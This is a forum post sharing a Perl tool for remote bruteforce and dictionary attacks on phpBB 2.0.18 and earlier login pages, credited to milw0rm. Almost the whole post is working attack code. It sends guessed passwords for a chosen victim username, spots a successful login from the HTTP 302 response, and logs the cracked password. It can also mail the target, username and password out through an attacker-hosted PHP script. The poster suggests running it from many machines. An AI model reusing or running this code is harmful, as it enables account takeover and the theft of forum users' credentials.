PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool (update)

Discussion in 'Forum for discussion of ANTICHAT' started by DarkFig, 5 Mar 2006.

  1. DarkFig

    DarkFig New Member

    Joined:
    21 Dec 2005
    Messages:
    1
    Likes Received:
    2
    Reputations:
    2
    Hi all, i have just released an update of my tool :)
    Code:
    #!/usr/bin/perl
    ####################################################################################################################
    # Title: PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool
    # Type: Bruteforce / Dictionary attack
    # New demo: [url]http://rapidshare.de/files/13694254/phpbbbtr.avi.html[/url] (1.06 mb)
    # Php Email Script data:  <? mail($destinataire, $objet, $contenu, "From: $expediteur\r\nReply-To: $expediteur"); ?>
    # Note: Host the php script and replace the line 34 [] Php script for the email option because win32 don't support Mail::Mailer
    # Changelog: Bruteforce option | Starting length | Email option | More fast | Die error disabled | 
    # Credits: DarkFig
    # Greetz: Romano [] Pgeo [] Fred [] CrackJerem [] Volcom [] Ddxs [] The truth [] And all man who like me =)
    # Web: [url]http://disarm.free.fr/bo_hard/[/url] (english language accepted..we are french sorry^^)
    ####################################################################################################################
    use IO::Socket;
    use LWP::Simple;
    
    #_Utilisation_
    if(@ARGV < 6){
    print q(
    +---------------------------------------------------------------------------------------------------+
    |             PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool [~_~] by DarkFig             |
    +---------------------------------------------------------------------------------------------------+
    |      Usage: phpbbbtr.pl <host> <path> <port> <attack> <char> <length> <victim> <log> <email>      |
    +---------------------------------------------------------------------------------------------------+
    | <host>   | The host where the php flaw is installed                       | [Ex: victim.com]      |
    | <path>   | Path of the php flaw                                           | [Ex: /vuln/]          |
    | <port>   | Port of the host                                               | [Ex: 80]              |
    | <attack> | Bruteforce[-btr] or Dictionary[-dict]                          | [Ex: -dict]           |
    | <char>   | Bruteforce[upperalpha, loweralpha, numeric] or Dictionary file | [Ex: dico.txt]        |
    | <length> | For the bruteforce option, define a starting length            | [Ex: 7]               |
    | <victim> | The victim's username                                          | [Ex: L4m3r]           |
    | <log>    | [Optional] File where you want to save the password            | [Ex: results.txt]     |
    | <email>  | [Optional] Email where the password will be sent               | [Ex: [email][email protected][/email]] |
    +---------------------------------------------------------------------------------------------------+
    );exit;}
    
    #_Configuration_
    $mailsite = "http://yoursite.com/mailme.php"; #Replace this value by the Url of the Php email script
    $shipper  = "xploitdarkfigbot%40gmail.com"; #Default shipper email, [email][email protected][/email] really exist => It work ;)
    $host     = $ARGV[0];
    $path     = $ARGV[1];
    $port     = $ARGV[2];
    $attack   = $ARGV[3];
    $content  = $ARGV[4];
    if($attack eq "-btr"){$length = $ARGV[5];$username = $ARGV[6];$results = $ARGV[7];if(!$ARGV[9]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[8];}}
    else {$username = $ARGV[5];$results = $ARGV[6];if(!$ARGV[7]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[7];}}
    $nligne   = "-1";
    $postit = "$path"."login.php";
    $full     = "http://"."$host"."$path";&hello;
    
    #_Hello_
    sub hello() {
    if($attack eq "-dict"){open dictionary, "<$content" || print "  [-]Can't open the file.";chomp(@dico = <dictionary>);}
    print "\n
    +--------------------------------------------------------+
     PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool
    +--------------------------------------------------------+
      [+]   Attack: ";if($attack eq "-btr"){print "Bruteforce";}if($attack eq "-dict"){print "Dictionary";};print" 
      [+]   Target: $full
      [+]     Port: $port
      [+] Username: $username
    +--------------------------------------------------------+";
    if($content eq "upperalpha"){$nligne = "A";}
    if($content eq "loweralpha"){$nligne = "a";}
    if($content eq "numeric"){$nligne = "0";}
    if($attack  eq "-dict"){&dictio;}if($attack  eq "-btr"){&generate;}}
    
    #_Bruteforce_
    sub generate() {
    $nligne x= $length;
    $passwordz = $nligne;
    print "\n  [~]Trying the password: $passwordz";
    &phpbb;}
    
    sub btrfr() {
    $nligne++;
    $passwordz = $nligne;
    print "\n  [~]Trying the password: $passwordz";
    &phpbb;}
    
    #_Dictionary_
    sub dictio() {
    $nligne++;
    $passwordz = $dico[$nligne];
    if($passwordz eq ""){&successfailed;}
    print "\n  [~]Trying the password: $passwordz";
    &phpbb;}
    
    #_Socket_
    sub phpbb(){
    while ($OK ne 1){
    $data   = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
    $length = length $data;
    my $send = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n  [-]Can't connect to the host.";
    print $send "POST $postit HTTP/1.1
    Host: $host
    Content-Type: application/x-www-form-urlencoded
    Content-Length: $length
    
    $data";
    read  $send, $answer, 15;
    close($send);
    if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
    &decision;}}
    
    #_Decision_
    sub decision(){if($OK ne 1){if($attack  eq "-dict"){&dictio;}if($attack  eq "-btr"){&btrfr;}} else {&successfailed;}}
    
    #_Success/Failed_
    sub successfailed(){
    if($OK eq 1){print "\n  [+]User: $username\n  [+]Password: $passwordz";}
    if($OK eq 0){print "\n  [-]User: $username\n  [-]Password: Not found";}
    open FILE, ">$results" || print "\n  [-]Can't write the file.";
    print FILE "
    +--------------------------------------------------------+
     PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool
    +--------------------------------------------------------+
      [+]   Target: $full
      [+]     Port: $port
      [+] Username: $username
      [+] Password: ";
    if($OK eq 1){print FILE "$passwordz";}
    if($OK eq 0){print FILE "Not found...";$passwordz = "Not found";}
    print FILE "\n+--------------------------------------------------------+\n";
    close FILE; close dictionary;
    
    #_EmailOption_
    if($mailoption eq 1){
    $fullmailurl = "$mailsite"."?expediteur="."$shipper"."&destinataire="."$email"."&objet="."[Xploit]Results for $host"."&contenu="."Target: $full"."%0D%0A"."Port: $port"."%0D%0A"."Username: $username"."%0D%0A"."Password: $passwordz";
    $mailpg      = get($fullmailurl) || print "\n  [-]Can't connect to the email script hoster.\n+--------------------------------------------------------+\n\n" and exit;
    print "\n  [+]Email sent, check your mail !\n+--------------------------------------------------------+\n\n";} else {print "\n+--------------------------------------------------------+\n";}exit;}
    
    # milw0rm.com [2006-02-20]
    Yeah, the speed is not very high but if you execute it on a lot of box...you can have some success ;)

    ++
     
    2 people like this.